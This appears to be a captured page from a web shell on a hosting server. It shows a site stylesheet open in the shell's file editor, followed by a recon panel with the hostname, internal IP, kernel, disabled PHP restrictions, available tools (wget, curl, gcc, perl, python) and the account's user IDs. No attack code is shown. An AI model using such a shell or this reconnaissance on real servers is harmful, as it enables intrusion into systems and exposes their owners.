#00fff2; background: #ffc107; -webkit-clip-path: polygon(0 0, 100% 0, 100% 60%, 0% 100%); clip-path: polygon(0 35px, 100% 0, 100% 100%, 0 100%); padding: 50px 20px 15px;} .registration-can2 .input-group { margin-bottom: 15px; padding: 0px 10px; border-bottom: 1px solid #fff; width: 100%; } .registration-can2 .input-group label { font-size: 15px;font-family: 'Oswald', sans-serif; width: 40%; text-align: left; float: left; } .registration-can2 .input-group input[type="text"] { font-size: 15px; color: #000; font-weight: bold; text-align: left; text-transform: none; letter-spacing: 1px; padding: 5px 0 5px 20px; width: 60%; display: inline-block; box-sizing: border-box; border: none; border-bottom-color: currentcolor; border-bottom-style: none; border-bottom-width: medium; outline: none; background: transparent; float: right; border-left: 1px solid #fff; } .registration-can2 .input-group textarea { font-size: 15px; color: #000; font-weight: bold; text-align: left; text-transform: none; letter-spacing: 1px; padding: 5px 0 5px 20px; width: 60%; display: inline-block; box-sizing: border-box; border: none; border-bottom-color: currentcolor; border-bottom-style: none; border-bottom-width: medium; outline: none; background: transparent; float: right; border-left: 1px solid #fff; } .registration-can2 .input-group input[type="password"] { font-size: 15px; color: #000; font-weight: bold; text-align: left; text-transform: none; letter-spacing: 1px; padding: 5px 0 5px 20px; width: 60%; display: inline-block; box-sizing: border-box; border: none; border-bottom-color: currentcolor; border-bottom-style: none; border-bottom-width: medium; outline: none; background: transparent; float: right; border-left: 1px solid #fff; } .registration-can2 .input-group select { font-size: 15px; color: #000; font-weight: bold; text-align: left; text-transform: none; letter-spacing: 1px; padding: 5px 0 5px 20px; width: 60%; display: inline-block; box-sizing: border-box; border: none; border-bottom-color: currentcolor; border-bottom-style: none; border-bottom-width: medium; outline: none; background: transparent; float: right; font-family: 'Oswald', sans-serif; border-left: 1px solid #fff; } .registration-can .input-group input[type="file"] { font-size: 15px; color: #000; font-weight: bold; text-align: left; text-transform: none; letter-spacing: 1px; padding: 5px 0 5px 20px; width: 60%; display: inline-block; box-sizing: border-box; border: none; border-bottom-color: currentcolor; border-bottom-style: none; border-bottom-width: medium; outline: none; background: transparent; float: right; border-left: 1px solid #fff; } .registration-can2 .input-group input[type="file"] { font-size: 15px; color: #000; font-weight: bold; text-align: left; text-transform: none; letter-spacing: 1px; padding: 5px 0 5px 20px; width: 60%; display: inline-block; box-sizing: border-box; border: none; border-bottom-color: currentcolor; border-bottom-style: none; border-bottom-width: medium; outline: none; background: transparent; float: right; border-left: 1px solid #fff; } .registration-can2 .input-group input[type=radio] { box-sizing: border-box; padding: 0; margin: 4px 6px 0 15px; } .registration-can2 input[type="submit"] { padding: 10px 0; width: 100%; border: none; background: -webkit-linear-gradient(top right, #00d8c2, #0068b7); margin: 20px 0px 10px; } h4.ad-edu{ font-family: 'Dosis', sans-serif; display: inline-block; font-size: 15px; background: #fff; padding: 5px 20px; margin: 0 0 5px; } .banner-inn-full{ position: relative; height: 600px; overflow: hidden; background: #ccc; -webkit-clip-path: polygon(0 0, 100% 0, 100% 60%, 0% 100%); clip-path: polygon(0 0, 100% 0, 100% 60%, 0% 100%);} .banner-inn-full::before { content: ''; position: absolute; width: 100%; height: 100%; top: 0; left: 0; background: #27615B; background: -webkit-linear-gradient(TO top right, #00d8c2, #0068b7); background: -moz-linear-gradient(TO top right, #00d8c2, #0068b7); background: linear-gradient(TO top right, #00d8c2, #0068b7); background-size: auto; background-size: cover; min-height: 100vh; opacity: 0.9; } img.fresh-in{ width: 100%; margin: -550px 0 0 0; position: relative; } .social-login{ width: 10%; margin: 0 10px 20px 0; } .social-login img.img-soc{ width: 100%; margin: 0 0 0 180px;} /* -- Responsive code -- */ @media screen and (max-width: 1280px) { .cliptop-blog-wthree { padding: 10em 0; } } @media screen and (max-width: 1080px) { .banner-w3pvt img { top: 181px; width: 57%; } .bnr-w3pvt-txt { margin-left: -2em; } .ab-border { left: 140px; } .demo>li { width: 303px; } .testi-agile p { width: 80%; } .w3layouts-contact-pos { left: 5%; width: 45%; } } @media screen and (max-width: 1050px) { .bnr-w3pvt-txt h3 { font-size: 1.5em; } .bnr-w3pvt-txt p { width: 500px; } .bnr-w3pvt-txt h3 { font-size: 1.3em; } .bnr-w3pvt-txt h4 { font-size: 2.2em; } .banner-w3pvt img { top: 0; width: 100%; position: fixed; } .w3-slide-grid h5 a { font-size: 0.9em; } .cliptop-portfolio-wthree { -webkit-clip-path: polygon(0 10%, 100% 0, 100% 90%, 0 100%); clip-path: polygon(0 10%, 100% 0, 100% 90%, 0 100%); } } @media screen and (max-width: 991px) { .ab-pvtw3 p { width: 100%; margin-bottom: 5em; } .ab-border { left: 265px; } .ab-border.rsp-border { border: none; } .ab-border.rsp-border span { display: none; } .ab-grid-bottom { margin-top: 0; } .sec-space { padding: 3em 0; } .demo>li { width: 223px; } .testi-left-grid { margin-bottom: 1em; } .testi-pos { margin: 1em 0; } .testimonials { padding: 2em 0 0; } .w3layouts-contact-pos { width: 50%; } .ab-grid-bottom { margin-top: 4em; } .social_w3ls_pvt ul { top: 38%; } } @media screen and (max-width: 900px) { .cliptop-blog-wthree { -webkit-clip-path: polygon(0 8%, 100% 0, 100% 92%, 0 100%); clip-path: polygon(0 8%, 100% 0, 100% 92%, 0 100%); padding: 7em 0; } .clipbottom-wthree { -webkit-clip-path: polygon(0 8%, 100% 0, 100% 100%, 0 100%); clip-path: polygon(0 8%, 100% 0, 100% 100%, 0 100%); } .ab-border.rsp-border { border: none; left: 0; } .col-lg-3.col-md-6.my-4.w3pvt-ab.text-center.position-relative { margin: 5em 0 !important; } .w3layouts-contact-pos-grid { padding: 7em 2em; } } @media screen and (max-width: 800px) { .banner-w3pvt img { top: 73px; } #menu { right: 0px; } nav.navbar.fixed-top.navbar-expand-lg.navbar-light.navbar-fixed-top, nav.navbar.fixed-top.navbar-expand-lg.navbar-light.navbar-fixed-top.top-nav-collapse { padding: 1em 6em; } #toggle { margin-right: 4em; } #menu { right: -11px; } .cliptop-portfolio-wthree { padding: 9em 0; } .w3layouts-contact-pos { width: 60%; } .social_w3ls_pvt ul li a { width: 37px; height: 37px; } .social_w3ls_pvt ul li a::after { top: 36px; left: -9px; } .social_w3ls_pvt ul li .fa { font-size: 19px; line-height: 38px; } } @media screen and (max-width: 768px) { .bnr-w3pvt-txt { margin-left: 0; } } @media screen and (max-width: 736px) { .banner-w3pvt img { top: 110px; } .ab-border { display: none; } .ab-pvtw3 p { margin-bottom: 3em; } .cliptop-blog-wthree { -webkit-clip-path: polygon(0 4%, 100% 0, 100% 96%, 0 100%); clip-path: polygon(0 4%, 100% 0, 100% 96%, 0 100%); } .cliptop-portfolio-wthree { -webkit-clip-path: polygon(0 6%, 100% 0, 100% 94%, 0 100%); clip-path: polygon(0 6%, 100% 0, 100% 94%, 0 100%); padding: 7em 0; } .testi-agile p { width: 100%; } .ab-grid-bottom { margin-top: 1em; } .w3layouts-contact-pos { width: 70%; } } @media screen and (max-width: 667px) { .bnr-w3pvt-txt h4 { font-size: 2em; } } @media screen and (max-width: 640px) { .banner-w3pvt img { top: 172px; } } @media screen and (max-width: 600px) { .w3layouts-contact-pos { width: 80%; } } @media screen and (max-width: 568px) { .bnr-w3pvt-txt p { width: 440px; } nav.navbar.fixed-top.navbar-expand-lg.navbar-light.navbar-fixed-top, nav.navbar.fixed-top.navbar-expand-lg.navbar-light.navbar-fixed-top.top-nav-collapse { padding: 1em 4em; } h4.w3layouts_pvt-head { font-size: 1.8em; } .box20 { margin-bottom: 0; } .demo>li { width: 254px; } .cliptop-portfolio-wthree { padding: 6em 0; } .w3layouts-contact-pos-grid { padding: 6em 2em 1em; } } @media screen and (max-width: 480px) { .bnr-w3pvt-txt h3 { font-size: 1.1em; } .bnr-w3pvt-txt h2 { font-size: 1.8em; } .bnr-w3pvt-txt p { width: 390px; } .demo>li { width: 210px; } .social_w3ls_pvt ul li { margin: 0 40px 0 0; } } @media screen and (max-width: 414px) { .bnr-w3pvt-txt h3 { font-size: 1.1em; line-height: 1.5; } h1.wthree-logo a { font-size: 0.8em; } .demo>li { width: 100%; } .cliptop-portfolio-wthree { padding: 5em 0; } .cliptop-portfolio-wthree { -webkit-clip-path: polygon(0 2%, 100% 0, 100% 98%, 0 100%); clip-path: polygon(0 2%, 100% 0, 100% 98%, 0 100%); padding: 5em 0; } .p-mask h4 { font-size: 1.3em; } .w3layouts-contact-pos { width: 100%; position: inherit; left: 0; } .clipbottom-wthree { -webkit-clip-path: polygon(0 0%, 100% 0, 100% 100%, 0 100%); clip-path: polygon(0 0%, 100% 0, 100% 100%, 0 100%); } .w3layouts-contact-pos-grid { padding: 3em 2em 2em; } .map-grid iframe { min-height: 500px; } .social_w3ls_pvt ul li { margin: 0 35px 0 0; } .bnr-w3pvt-txt p { width: 360px; } } @media screen and (max-width: 384px) { .bnr-w3pvt-txt p { width: 340px; } .bnr-w3pvt-txt h4 { font-size: 1.8em; } .bnr-w3pvt-txt h2 { font-size: 1.6em; } nav.navbar.fixed-top.navbar-expand-lg.navbar-light.navbar-fixed-top, nav.navbar.fixed-top.navbar-expand-lg.navbar-light.navbar-fixed-top.top-nav-collapse { padding: 1em 3em; } #toggle { margin-right: 1em; } #menu { right: -36px; width: 150px; } #menu:after { left: 69px; } .cliptop-blog-wthree { padding: 5em 0; } .social_w3ls_pvt ul li { margin: 0 29px 0 0; } } @media screen and (max-width: 375px) { .social_w3ls_pvt ul li a { width: 30px; height: 30px; } .social_w3ls_pvt ul li a::after { top: 29px; } .social_w3ls_pvt ul li .fa { font-size: 17px; line-height: 27px; } } @media screen and (max-width: 320px) { .bnr-w3pvt-txt p { width: 280px; } .bnr-w3pvt-txt h4 { font-size: 1.5em; } h4.w3layouts_pvt-head { font-size: 1.6em; } .w3-slide-grid h5 a { font-size: 0.75em; } .social_w3ls_pvt ul li { margin: 0 24px 0 0; } .social_w3ls_pvt ul li a { width: 25px; height: 25px; } .social_w3ls_pvt ul li a::after { top: 24px; left: -9px; } .social_w3ls_pvt ul li .fa { font-size: 14px; } } /* -- //Responsive code -- */
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 678.15 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619